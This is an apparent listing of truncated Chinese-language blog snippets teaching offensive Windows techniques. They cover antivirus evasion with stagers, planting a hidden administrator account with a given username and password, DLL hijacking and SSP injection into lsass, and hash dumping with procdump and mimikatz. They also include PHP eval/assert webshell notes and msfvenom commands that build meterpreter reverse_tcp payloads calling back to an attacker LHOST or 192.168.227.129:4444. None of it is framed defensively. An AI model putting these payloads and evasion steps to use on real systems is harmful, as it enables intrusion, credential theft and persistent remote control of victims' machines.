反病毒解決方案用於檢測惡意文件，並且通常使用靜態分析技術來區分二進制文件的好壞。如果是惡意文件本身包含惡意內容(ShellCode)，那么依靠靜態分析技術會非常有效，但如果攻擊者使用輕量級的stager來代替下載並將代碼加載到內存中，會發生什么？事實證明這樣做可以繞過大多數殺軟的查殺。 雖然這種 ...

windows繞過殺軟添加賬戶密碼 起因：system權限下存在殺軟無法添加賬戶信息 繞過方法 1、C#腳本 運行后會在目標機器上創建一個用戶為 wh4am1 密碼為 qqai@love 的 Administrators 組用戶 2、Dll劫持 3、copy net1 ...

msfvenom——木馬免殺篇 目錄 msfvenom——木馬免殺篇 c語言執行 生成shellcode.c c語言執行 檢查 python語言執行 方法 ...

正常的 ssp 擴展（dll）可以加載到 lsass 進程中去，比如 kerberos 驗證都是通過加載 kerberos.dll (它就是一種 ssp)調用 sspi 來進行驗證，所以我們就可以控制加載一個我們自己的 dll 執行惡意代碼從而 dump hash，但是殺軟肯定會對常規 ...

思路： 就是通過系統自帶的procdump去下載存儲用戶名密碼的文件（應該不能那么說這個文件，但是這樣理解沒問題），然后用獼猴桃讀取。 procdump.exe Procdum ...

貼上使用筆記 不多介紹了 很簡單的東西 msfvenom各平台生成木馬大全: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻擊機IP LPORT=攻擊機端口 ...

轉自：https://www.cnblogs.com/-qing-/p/10631414.html 0x03 關於eval 於 assert# 關於eval函數在php給出的官方說明是 e ...

免殺2-msf免殺 1. 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f c 2. 生成python腳本 echo ‘密文 ...